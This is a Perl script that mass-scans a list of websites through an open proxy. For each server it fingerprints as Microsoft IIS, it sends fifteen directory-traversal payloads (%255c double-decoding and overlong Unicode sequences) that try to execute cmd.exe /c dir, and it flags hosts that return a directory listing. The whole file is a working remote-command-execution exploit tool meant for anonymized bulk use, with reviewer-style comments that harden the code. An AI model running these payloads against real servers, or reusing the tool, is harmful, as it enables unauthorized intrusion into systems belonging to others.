#!/usr/bin/perl
#
# This program is based on the decodecheck written by Spidermark.
# It scans (through an OPEN PROXY) a LIST of sites and ONLY probes
# IIS servers (there is no point in checking Apache and the rest).
# If a site is not running IIS, it prints what server it is running and
# skips to the next entry in the list (this saves a lot of time).
# It checks for the "decode" (%255c double-decoding) and the older
# Unicode (%c0%af-style) directory-traversal bugs in IIS.  A "Safe"
# verdict only means that none of the probes below returned a directory
# listing through that proxy; it is not a general statement about the host.
#
# Renato Turini - renatoturini@uol.com.br
#
#
$| = 1;    # unbuffered STDOUT so the per-probe "." progress dots show up live

# Probe URIs appended to "http://<target>".  Every one of them tries to walk
# out of an IIS virtual directory to \winnt\system32\cmd.exe and run "dir";
# a "Directory" line in the reply means the traversal reached cmd.exe.
#
#   %255c              "decode" check: %25 decodes to '%', so %255c becomes
#                      %5c and then '\' when the path is decoded a second time.
#   %c0%af, %c1%9c     overlong UTF-8 forms of '/' and '\' (the "unicode" check).
#   %c1%1c, %c0%9v, %c0%qf, %c1%8s, %c1%pc
#                      malformed sequences (not valid hex / not valid UTF-8)
#                      carried over unchanged from decodecheck -- NOTE(review):
#                      presumably relying on lax decoding in old IIS, not
#                      verified here.
@unis = qw(
    /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
    /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
    /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
);

use Socket;

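# Usage: cool2 list proxy proxy_port
#   list        file with one target host[:port] per line; blank lines and
#               lines starting with '#' are skipped
#   proxy       hostname or dotted-quad of the HTTP proxy every request is
#               bounced through (the proxy operator sees every probe)
#   proxy_port  TCP port of that proxy (1-65535)
if ($#ARGV < 2) { die "Usage: cool2 list proxy proxy_port\n"; }

my $lista = $ARGV[0];

# $proxy, $port and $bounce stay package globals on purpose: sendraw() reads
# $port and $bounce directly when it builds the sockaddr.
our ($proxy, $port, $bounce);
$proxy = $ARGV[1];    # was @ARGV[1], a one-element slice; the scalar is meant
$port  = $ARGV[2];

# Reject a non-numeric or out-of-range port here instead of letting pack()
# silently truncate it inside sendraw().
unless ($port =~ /\A\d+\z/ && $port >= 1 && $port <= 65535) {
    die "Bad proxy port '$port' (must be 1-65535)\n";
}

# Resolve the proxy once, not once per target, and fail loudly if the name
# does not resolve -- otherwise undef reaches pack() and every "connect"
# goes to 0.0.0.0.
$bounce = inet_aton($proxy)
    or die "Can't resolve proxy '$proxy'\n";

open(my $list_fh, '<', $lista)
    or die "Can't open file '$lista': $!";

TARGET:
while (my $target = <$list_fh>) {
    # strip CR/LF and trailing blanks so a DOS-format list still works
    $target =~ s/\s+\z//;
    next TARGET if $target eq '' || $target =~ /\A\s*#/;

    # Anything with embedded whitespace would corrupt the HTTP request line
    # we build below (request-line injection), so refuse it.
    if ($target =~ /\s/) {
        warn "Skipping malformed target '$target'\n";
        next TARGET;
    }

    print "Testing $target\n";

    my @iis = sendraw("GET http://$target/index HTTP/1.0\r\n\r\n");

    # Only the Server: header decides whether we probe.  Header names are
    # case-insensitive, and we take the first one so a body line that
    # happens to start with "Server" cannot trigger a second probe run.
    my ($server) = grep { /\AServer\s*:/i } @iis;
    # No Server header at all (empty reply, proxy error page, ...): nothing
    # to classify, move on silently as the original did.
    next TARGET unless defined $server;

    print "The site is running:\n";
    print $server;    # still carries its newline from the socket read

    if ($server !~ /Microsoft-IIS/) {
        print "skeeping...\n\n";
        next TARGET;
    }

    print "let's check it out\n";

    # $flag is set as soon as any probe comes back with a listing.
    my $flag = 0;
    foreach my $uni (@unis) {
        print ".";
        my @results = sendraw("GET http://$target$uni HTTP/1.0\r\n\r\n");
        # "Directory of C:\..." is the first line of cmd.exe's dir output;
        # any match means the traversal reached cmd.exe.
        foreach my $res_line (@results) {
            if ($res_line =~ /Directory/) {
                print "Not safe:\n $uni\n";
                $flag = 1;
            }
        }
    }
    print "\n";

    # "Safe" only means none of the @unis probes returned a listing through
    # this proxy -- it is not a general statement about the host.
    if ($flag == 1) { print "Vulnerable\n\n"; }
    else            { print "Safe\n\n"; }
}
close($list_fh);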



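# sendraw($request) -- open a fresh TCP connection to the proxy ($bounce and
# $port are package globals set by the main program), write the raw HTTP
# request string as-is, and return every line the peer sends back until it
# closes the connection.  Dies if the socket cannot be created or the proxy
# cannot be reached.  (Based on RFP's sendraw, rfp@wiretrip.net.)
sub sendraw {
    my ($pstr) = @_;

    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        or die("Socket problems\n");

    # sockaddr_in() builds the struct portably; the old hand-packed
    # "SnA4x8" depended on the host's sin_family layout.
    connect($sock, sockaddr_in($port, $bounce))
        or die("Can't connect...: $!\n");

    # Autoflush this handle only, restoring whatever was select()ed before,
    # so the caller's default output handle is not left pointing elsewhere.
    select((select($sock), $| = 1)[0]);
    print {$sock} $pstr;

    # HTTP/1.0 without keep-alive: the peer closes after the response, so
    # reading to EOF captures the whole transaction.
    my @in = <$sock>;
    close($sock);
    return @in;
}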



